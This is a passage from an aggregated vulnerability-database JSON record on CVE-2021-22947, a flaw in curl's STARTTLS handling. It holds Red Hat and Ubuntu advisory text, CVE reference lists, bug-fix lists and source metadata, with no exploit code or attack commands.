References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3577\nhttps://access.redhat.com/security/cve/CVE-2016-10228\nhttps://access.redhat.com/security/cve/CVE-2017-14502\nhttps://access.redhat.com/security/cve/CVE-2018-20843\nhttps://access.redhat.com/security/cve/CVE-2018-1000858\nhttps://access.redhat.com/security/cve/CVE-2019-8625\nhttps://access.redhat.com/security/cve/CVE-2019-8710\nhttps://access.redhat.com/security/cve/CVE-2019-8720\nhttps://access.redhat.com/security/cve/CVE-2019-8743\nhttps://access.redhat.com/security/cve/CVE-2019-8764\nhttps://access.redhat.com/security/cve/CVE-2019-8766\nhttps://access.redhat.com/security/cve/CVE-2019-8769\nhttps://access.redhat.com/security/cve/CVE-2019-8771\nhttps://access.redhat.com/security/cve/CVE-2019-8782\nhttps://access.redhat.com/security/cve/CVE-2019-8783\nhttps://access.redhat.com/security/cve/CVE-2019-8808\nhttps://access.redhat.com/security/cve/CVE-2019-8811\nhttps://access.redhat.com/security/cve/CVE-2019-8812\nhttps://access.redhat.com/security/cve/CVE-2019-8813\nhttps://access.redhat.com/security/cve/CVE-2019-8814\nhttps://access.redhat.com/security/cve/CVE-2019-8815\nhttps://access.redhat.com/security/cve/CVE-2019-8816\nhttps://access.redhat.com/security/cve/CVE-2019-8819\nhttps://access.redhat.com/security/cve/CVE-2019-8820\nhttps://access.redhat.com/security/cve/CVE-2019-8823\nhttps://access.redhat.com/security/cve/CVE-2019-8835\nhttps://access.redhat.com/security/cve/CVE-2019-8844\nhttps://access.redhat.com/security/cve/CVE-2019-8846\nhttps://access.redhat.com/security/cve/CVE-2019-9169\nhttps://access.redhat.com/security/cve/CVE-2019-13050\nhttps://access.redhat.com/security/cve/CVE-2019-13627\nhttps://access.redhat.com/security/cve/CVE-2019-14889\nhttps://access.redhat.com/security/cve/CVE-2019-15903\nhttps://access.redhat.com/security/cve/CVE-2019-19906\nhttps://access.redhat.com/security/cve/CVE-2019-20454\nhttps://access.redhat.com/security/cve/CVE-2019-20807\nhttps://access.redhat.com/se
curity/cve/CVE-2019-25013\nhttps://access.redhat.com/security/cve/CVE-2020-1730\nhttps://access.redhat.com/security/cve/CVE-2020-3862\nhttps://access.redhat.com/security/cve/CVE-2020-3864\nhttps://access.redhat.com/security/cve/CVE-2020-3865\nhttps://access.redhat.com/security/cve/CVE-2020-3867\nhttps://access.redhat.com/security/cve/CVE-2020-3868\nhttps://access.redhat.com/security/cve/CVE-2020-3885\nhttps://access.redhat.com/security/cve/CVE-2020-3894\nhttps://access.redhat.com/security/cve/CVE-2020-3895\nhttps://access.redhat.com/security/cve/CVE-2020-3897\nhttps://access.redhat.com/security/cve/CVE-2020-3899\nhttps://access.redhat.com/security/cve/CVE-2020-3900\nhttps://access.redhat.com/security/cve/CVE-2020-3901\nhttps://access.redhat.com/security/cve/CVE-2020-3902\nhttps://access.redhat.com/security/cve/CVE-2020-8927\nhttps://access.redhat.com/security/cve/CVE-2020-9802\nhttps://access.redhat.com/security/cve/CVE-2020-9803\nhttps://access.redhat.com/security/cve/CVE-2020-9805\nhttps://access.redhat.com/security/cve/CVE-2020-9806\nhttps://access.redhat.com/security/cve/CVE-2020-9807\nhttps://access.redhat.com/security/cve/CVE-2020-9843\nhttps://access.redhat.com/security/cve/CVE-2020-9850\nhttps://access.redhat.com/security/cve/CVE-2020-9862\nhttps://access.redhat.com/security/cve/CVE-2020-9893\nhttps://access.redhat.com/security/cve/CVE-2020-9894\nhttps://access.redhat.com/security/cve/CVE-2020-9895\nhttps://access.redhat.com/security/cve/CVE-2020-9915\nhttps://access.redhat.com/security/cve/CVE-2020-9925\nhttps://access.redhat.com/security/cve/CVE-2020-9952\nhttps://access.redhat.com/security/cve/CVE-2020-10018\nhttps://access.redhat.com/security/cve/CVE-2020-11793\nhttps://access.redhat.com/security/cve/CVE-2020-13434\nhttps://access.redhat.com/security/cve/CVE-2020-14391\nhttps://access.redhat.com/security/cve/CVE-2020-15358\nhttps://access.redhat.com/security/cve/CVE-2020-15503\nhttps://access.redhat.com/security/cve/CVE-2020-25660\nhttps://access.redhat.
com/security/cve/CVE-2020-25677\nhttps://access.redhat.com/security/cve/CVE-2020-27618\nhttps://access.redhat.com/security/cve/CVE-2020-27781\nhttps://access.redhat.com/security/cve/CVE-2020-29361\nhttps://access.redhat.com/security/cve/CVE-2020-29362\nhttps://access.redhat.com/security/cve/CVE-2020-29363\nhttps://access.redhat.com/security/cve/CVE-2021-3121\nhttps://access.redhat.com/security/cve/CVE-2021-3326\nhttps://access.redhat.com/security/cve/CVE-2021-3449\nhttps://access.redhat.com/security/cve/CVE-2021-3450\nhttps://access.redhat.com/security/cve/CVE-2021-3516\nhttps://access.redhat.com/security/cve/CVE-2021-3517\nhttps://access.redhat.com/security/cve/CVE-2021-3518\nhttps://access.redhat.com/security/cve/CVE-2021-3520\nhttps://access.redhat.com/security/cve/CVE-2021-3521\nhttps://access.redhat.com/security/cve/CVE-2021-3537\nhttps://access.redhat.com/security/cve/CVE-2021-3541\nhttps://access.redhat.com/security/cve/CVE-2021-3733\nhttps://access.redhat.com/security/cve/CVE-2021-3749\nhttps://access.redhat.com/security/cve/CVE-2021-20305\nhttps://access.redhat.com/security/cve/CVE-2021-21684\nhttps://access.redhat.com/security/cve/CVE-2021-22946\nhttps://access.redhat.com/security/cve/CVE-2021-22947\nhttps://access.redhat.com/security/cve/CVE-2021-25215\nhttps://access.redhat.com/security/cve/CVE-2021-27218\nhttps://access.redhat.com/security/cve/CVE-2021-30666\nhttps://access.redhat.com/security/cve/CVE-2021-30761\nhttps://access.redhat.com/security/cve/CVE-2021-30762\nhttps://access.redhat.com/security/cve/CVE-2021-33928\nhttps://access.redhat.com/security/cve/CVE-2021-33929\nhttps://access.redhat.com/security/cve/CVE-2021-33930\nhttps://access.redhat.com/security/cve/CVE-2021-33938\nhttps://access.redhat.com/security/cve/CVE-2021-36222\nhttps://access.redhat.com/security/cve/CVE-2021-37750\nhttps://access.redhat.com/security/cve/CVE-2021-39226\nhttps://access.redhat.com/security/cve/CVE-2021-41190\nhttps://access.redhat.com/security/cve/CVE-2021-43813\n
https://access.redhat.com/security/cve/CVE-2021-44716\nhttps://access.redhat.com/security/cve/CVE-2021-44717\nhttps://access.redhat.com/security/cve/CVE-2022-0532\nhttps://access.redhat.com/security/cve/CVE-2022-21673\nhttps://access.redhat.com/security/cve/CVE-2022-24407\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYipqONzjgjWX9erEAQjQcBAAgWTjA6Q2NgqfVf63ZpJF1jPurZLPqxDL\n0in/5+/wqWaiQ6yk7wM3YBZgviyKnAMCVdrLsaR7R77BvfJcTE3W/fzogxpp6Rne\neGT1PTgQRecrSIn+WG4gGSteavTULWOIoPvUiNpiy3Y7fFgjFdah+Nyx3Xd+xehM\nCEswylOd6Hr03KZ1tS3XL3kGL2botha48Yls7FzDFbNcy6TBAuycmQZifKu8mHaF\naDAupVJinDnnVgACeS6CnZTAD+Vrx5W7NIisteXv4x5Hy+jBIUHr8Yge3oxYoFnC\nY/XmuOw2KilLZuqFe+KHig45qT+FmNU8E1egcGpNWvmS8hGZfiG1jEQAqDPbZHxp\nsQAQZLQyz3TvXa29vp4QcsUuMxndIOi+QaK75JmqE06MqMIlFDYpr6eQOIgIZvFO\nRDZU/qvBjh56ypInoqInBf8KOQMy6eO+r6nFbMGcAfucXmz0EVcSP1oFHAoA1nWN\nrs1Qz/SO4CvdPERxcr1MLuBLggZ6iqGmHKk5IN0SwcndBHaVJ3j/LBv9m7wBYVry\nbSvojBDYx5ricbTwB5sGzu7oH5yVl813FA9cjkFpEhBiMtTfI+DKC8ssoRYNHd5Z\n7gLW6KWPUIDuCIiiioPZAJMyvJ0IMrNDoQ0lhqPeV7PFdlRhT95M/DagUZOpPVuT\nb5PUYUBIZLc=\n=GUDA\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nUbuntu Security Notice USN-5079-1\nSeptember 15, 2021\n\ncurl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.04\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in curl. 
\n\nSoftware Description:\n- curl: HTTP, HTTPS, and FTP client and client libraries\n\nDetails:\n\nIt was discovered that curl incorrect handled memory when sending data to\nan MQTT server. A remote attacker could use this issue to cause curl to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. (CVE-2021-22945)\n\nPatrick Monnerat discovered that curl incorrectly handled upgrades to TLS. (CVE-2021-22946)\n\nPatrick Monnerat discovered that curl incorrectly handled responses\nreceived before STARTTLS. A remote attacker could possibly use this issue\nto inject responses and intercept communications. (CVE-2021-22947)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.04:\n curl 7.74.0-1ubuntu2.3\n libcurl3-gnutls 7.74.0-1ubuntu2.3\n libcurl3-nss 7.74.0-1ubuntu2.3\n libcurl4 7.74.0-1ubuntu2.3\n\nUbuntu 20.04 LTS:\n curl 7.68.0-1ubuntu2.7\n libcurl3-gnutls 7.68.0-1ubuntu2.7\n libcurl3-nss 7.68.0-1ubuntu2.7\n libcurl4 7.68.0-1ubuntu2.7\n\nUbuntu 18.04 LTS:\n curl 7.58.0-2ubuntu3.15\n libcurl3-gnutls 7.58.0-2ubuntu3.15\n libcurl3-nss 7.58.0-2ubuntu3.15\n libcurl4 7.58.0-2ubuntu3.15\n\nIn general, a standard system update will make all the necessary changes. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic\n1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet\n1997017 - unprivileged client fails to get guest agent data\n1998855 - Node drain: Sometimes source virt-launcher pod status is Failed and not Completed\n2000251 - RoleBinding and ClusterRoleBinding brought in by kubevirt does not get reconciled when kind is ServiceAccount\n2001270 - [VMIO] [Warm from Vmware] Snapshot files are not deleted after Successful Import\n2001281 - [VMIO] [Warm from VMware] Source VM should not be turned ON if vmio import is removed\n2001901 - [4.8.3] NNCP creation failures after nmstate-handler pod deletion\n2007336 - 4.8.3 containers\n2007776 - Failed to Migrate Windows VM with CDROM (readonly)\n2008511 - [CNV-4.8.3] VMI is in LiveMigrate loop when Upgrading Cluster from 2.6.7/4.7.32 to OCP 4.8.13\n2012890 - With descheduler during multiple VMIs migrations, some VMs are restarted\n2025475 - [4.8.3] Upgrade from 2.6 to 4.x versions failed due to vlan-filtering issues\n2026881 - [4.8.3] vlan-filtering is getting applied on veth ports\n\n5. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution\n2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport)\n2006842 - MigCluster CR remains in \"unready\" state and source registry is inaccessible after temporary shutdown of source cluster\n2007429 - \"oc describe\" and \"oc log\" commands on \"Migration resources\" tree cannot be copied after failed migration\n2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)\n\n5. Description:\n\nRed Hat OpenShift Serverless release of the OpenShift Serverless Operator. \n\nSecurity Fix(es):\n\n* golang: net/http/httputil: panic due to racy read of persistConn after\nhandler panic (CVE-2021-36221)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic\n2016256 - Release of OpenShift Serverless Eventing 1.19.0\n2016258 - Release of OpenShift Serverless Serving 1.19.0\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-22947"
},
{
"db": "VULHUB",
"id": "VHN-381421"
},
{
"db": "VULMON",
"id": "CVE-2021-22947"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166714"
},
{
"db": "PACKETSTORM",
"id": "165209"
},
{
"db": "PACKETSTORM",
"id": "166279"
},
{
"db": "PACKETSTORM",
"id": "164171"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165053"
}
],
"trust": 1.8
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-22947",
"trust": 2.0
},
{
"db": "SIEMENS",
"id": "SSA-389290",
"trust": 1.1
},
{
"db": "HACKERONE",
"id": "1334763",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "165053",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165135",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165209",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165099",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165337",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164993",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164740",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166319",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164948",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166112",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-381421",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-22947",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165631",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166714",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166279",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164171",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381421"
},
{
"db": "VULMON",
"id": "CVE-2021-22947"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166714"
},
{
"db": "PACKETSTORM",
"id": "165209"
},
{
"db": "PACKETSTORM",
"id": "166279"
},
{
"db": "PACKETSTORM",
"id": "164171"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165053"
},
{
"db": "NVD",
"id": "CVE-2021-22947"
}
]
},
"id": "VAR-202109-1789",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-381421"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:33:54.751000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
                "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-22947"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-22947"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-345",
"trust": 1.1
},
{
"problemtype": "CWE-310",
"trust": 1.0
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381421"
},
{
"db": "NVD",
"id": "CVE-2021-22947"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20211029-0003/"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213183"
},
{
"trust": 1.1,
"url": "https://www.debian.org/security/2022/dsa-5197"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/mar/29"
},
{
"trust": 1.1,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.1,
"url": "https://hackerone.com/reports/1334763"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2021/09/msg00022.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2022/08/msg00017.html"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/apoak4x73ejtaptsvt7irvdmuwvxnwgd/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rwlec6yvem2hwubx67sdgpsy4cqb72oe/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2021-22946"
},
{
"trust": 0.7,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2021-22947"
},
{
"trust": 0.7,
        "url": "https://bugzilla.redhat.com/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3733"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-33938"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-33929"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-33928"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-33930"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-37750"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20266"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-36222"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43527"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20271"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3948"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36385"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43267"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36385"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20317"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20317"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/apoak4x73ejtaptsvt7irvdmuwvxnwgd/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rwlec6yvem2hwubx67sdgpsy4cqb72oe/"
},
{
"trust": 0.1,
"url": "http://seclists.org/oss-sec/2021/q3/168"
},
{
"trust": 0.1,
"url": "https://security.archlinux.org/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3575"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30758"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30665"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30689"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30682"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-18032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1801"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1765"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26927"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1788"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30744"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21775"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36241"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30797"
},
